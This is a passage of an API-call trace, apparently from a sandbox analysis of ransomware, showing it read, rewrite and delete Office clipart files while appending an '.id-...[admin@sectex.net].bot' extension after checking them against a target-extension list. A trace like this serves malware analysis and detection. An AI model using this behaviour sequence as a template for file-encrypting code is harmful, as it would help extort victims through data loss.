	[0169.021] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.021] SetEndOfFile (hFile=0x3a8) returned 1
	[0169.023] CloseHandle (hObject=0x3a8) returned 1
	[0169.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.024] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf")) returned 1
	[0169.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.024] lstrlenW (lpString=".doc") returned 4
	[0169.024] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString=".docx") returned 5
	[0169.025] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.025] lstrlenW (lpString=".pdf") returned 4
	[0169.025] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString=".xls") returned 4
	[0169.025] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.025] lstrlenW (lpString=".xlsx") returned 5
	[0169.025] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.025] lstrlenW (lpString=".ppt") returned 4
	[0169.025] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.025] lstrlenW (lpString=".zip") returned 4
	[0169.025] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.025] lstrlenW (lpString=".rar") returned 4
	[0169.025] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString=".bz2") returned 4
	[0169.025] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString=".7z") returned 3
	[0169.025] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.025] lstrlenW (lpString=".dbf") returned 4
	[0169.025] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.025] lstrlenW (lpString=".1cd") returned 4
	[0169.025] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.025] lstrlenW (lpString=".jpg") returned 4
	[0169.025] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.025] lstrlenW (lpString=".doc") returned 4
	[0169.025] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.025] lstrlenW (lpString=".docx") returned 5
	[0169.026] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.026] lstrlenW (lpString=".pdf") returned 4
	[0169.026] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.026] lstrlenW (lpString=".xls") returned 4
	[0169.026] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.026] lstrlenW (lpString=".xlsx") returned 5
	[0169.026] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.075] lstrlenW (lpString=".ppt") returned 4
	[0169.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.075] lstrlenW (lpString=".zip") returned 4
	[0169.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.075] lstrlenW (lpString=".rar") returned 4
	[0169.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.075] lstrlenW (lpString=".bz2") returned 4
	[0169.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.075] lstrlenW (lpString=".7z") returned 3
	[0169.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.075] lstrlenW (lpString=".dbf") returned 4
	[0169.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.075] lstrlenW (lpString=".1cd") returned 4
	[0169.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 63
	[0169.075] lstrlenW (lpString=".jpg") returned 4
	[0169.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.076] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.076] lstrlenW (lpString="J0152702.WMF") returned 12
	[0169.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0169.094] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1208) returned 1
	[0169.094] CloseHandle (hObject=0x268) returned 1
	[0169.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf")) returned 0x20
	[0169.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0169.095] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.095] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0169.096] GetLastError () returned 0x0
	[0169.096] ReadFile (in: hFile=0x268, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4b8, lpOverlapped=0x0) returned 1
	[0169.126] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4c0, lpOverlapped=0x0) returned 1
	[0169.126] ReadFile (in: hFile=0x268, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.127] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.127] SetEndOfFile (hFile=0x25c) returned 1
	[0169.127] CloseHandle (hObject=0x25c) returned 1
	[0169.127] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.127] SetEndOfFile (hFile=0x268) returned 1
	[0169.131] CloseHandle (hObject=0x268) returned 1
	[0169.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.132] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf")) returned 1
	[0169.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.132] lstrlenW (lpString=".doc") returned 4
	[0169.132] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString=".docx") returned 5
	[0169.133] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.133] lstrlenW (lpString=".pdf") returned 4
	[0169.133] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString=".xls") returned 4
	[0169.133] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.133] lstrlenW (lpString=".xlsx") returned 5
	[0169.133] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.133] lstrlenW (lpString=".ppt") returned 4
	[0169.133] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.133] lstrlenW (lpString=".zip") returned 4
	[0169.133] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.133] lstrlenW (lpString=".rar") returned 4
	[0169.133] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString=".bz2") returned 4
	[0169.133] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString=".7z") returned 3
	[0169.133] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.133] lstrlenW (lpString=".dbf") returned 4
	[0169.133] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.133] lstrlenW (lpString=".1cd") returned 4
	[0169.133] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.133] lstrlenW (lpString=".jpg") returned 4
	[0169.133] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.133] lstrlenW (lpString=".doc") returned 4
	[0169.133] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.133] lstrlenW (lpString=".docx") returned 5
	[0169.133] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.134] lstrlenW (lpString=".pdf") returned 4
	[0169.134] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.134] lstrlenW (lpString=".xls") returned 4
	[0169.134] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.144] lstrlenW (lpString=".xlsx") returned 5
	[0169.144] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.144] lstrlenW (lpString=".ppt") returned 4
	[0169.144] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.144] lstrlenW (lpString=".zip") returned 4
	[0169.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.144] lstrlenW (lpString=".rar") returned 4
	[0169.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.144] lstrlenW (lpString=".bz2") returned 4
	[0169.144] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.144] lstrlenW (lpString=".7z") returned 3
	[0169.144] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.144] lstrlenW (lpString=".dbf") returned 4
	[0169.145] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.145] lstrlenW (lpString=".1cd") returned 4
	[0169.145] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 63
	[0169.145] lstrlenW (lpString=".jpg") returned 4
	[0169.145] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.145] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.145] lstrlenW (lpString="J0152876.WMF") returned 12
	[0169.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0169.161] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=7876) returned 1
	[0169.161] CloseHandle (hObject=0x3b8) returned 1
	[0169.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf")) returned 0x20
	[0169.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.182] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.182] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0169.183] GetLastError () returned 0x0
	[0169.183] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1ec4, lpOverlapped=0x0) returned 1
	[0169.196] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1ed0, lpOverlapped=0x0) returned 1
	[0169.197] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.197] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.198] SetEndOfFile (hFile=0x3ac) returned 1
	[0169.198] CloseHandle (hObject=0x3ac) returned 1
	[0169.198] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.198] SetEndOfFile (hFile=0x3d0) returned 1
	[0169.200] CloseHandle (hObject=0x3d0) returned 1
	[0169.200] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf")) returned 1
	[0169.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.283] lstrlenW (lpString=".doc") returned 4
	[0169.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.283] lstrlenW (lpString=".docx") returned 5
	[0169.283] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0169.283] lstrlenW (lpString=".pdf") returned 4
	[0169.283] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.283] lstrlenW (lpString=".xls") returned 4
	[0169.283] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.283] lstrlenW (lpString=".xlsx") returned 5
	[0169.283] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0169.283] lstrlenW (lpString=".ppt") returned 4
	[0169.283] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.283] lstrlenW (lpString=".zip") returned 4
	[0169.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.283] lstrlenW (lpString=".rar") returned 4
	[0169.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.283] lstrlenW (lpString=".bz2") returned 4
	[0169.283] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.283] lstrlenW (lpString=".7z") returned 3
	[0169.283] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.283] lstrlenW (lpString=".dbf") returned 4
	[0169.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.283] lstrlenW (lpString=".1cd") returned 4
	[0169.283] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.283] lstrlenW (lpString=".jpg") returned 4
	[0169.283] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.284] lstrlenW (lpString=".doc") returned 4
	[0169.284] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.284] lstrlenW (lpString=".docx") returned 5
	[0169.284] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0169.284] lstrlenW (lpString=".pdf") returned 4
	[0169.284] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.284] lstrlenW (lpString=".xls") returned 4
	[0169.284] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.284] lstrlenW (lpString=".xlsx") returned 5
	[0169.284] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0169.284] lstrlenW (lpString=".ppt") returned 4
	[0169.284] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.284] lstrlenW (lpString=".zip") returned 4
	[0169.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.284] lstrlenW (lpString=".rar") returned 4
	[0169.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.284] lstrlenW (lpString=".bz2") returned 4
	[0169.284] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.284] lstrlenW (lpString=".7z") returned 3
	[0169.284] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.284] lstrlenW (lpString=".dbf") returned 4
	[0169.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.284] lstrlenW (lpString=".1cd") returned 4
	[0169.284] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 63
	[0169.284] lstrlenW (lpString=".jpg") returned 4
	[0169.284] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.285] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.285] lstrlenW (lpString="J0152898.WMF") returned 12
	[0169.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.285] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4496) returned 1
	[0169.285] CloseHandle (hObject=0x354) returned 1
	[0169.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf")) returned 0x20
	[0169.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.286] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.286] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0169.287] GetLastError () returned 0x0
	[0169.287] ReadFile (in: hFile=0x354, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1190, lpOverlapped=0x0) returned 1
	[0169.333] WriteFile (in: hFile=0x350, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x11a0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x11a0, lpOverlapped=0x0) returned 1
	[0169.334] ReadFile (in: hFile=0x354, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.334] WriteFile (in: hFile=0x350, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.334] SetEndOfFile (hFile=0x350) returned 1
	[0169.334] CloseHandle (hObject=0x350) returned 1
	[0169.334] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.334] SetEndOfFile (hFile=0x354) returned 1
	[0169.345] CloseHandle (hObject=0x354) returned 1
	[0169.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
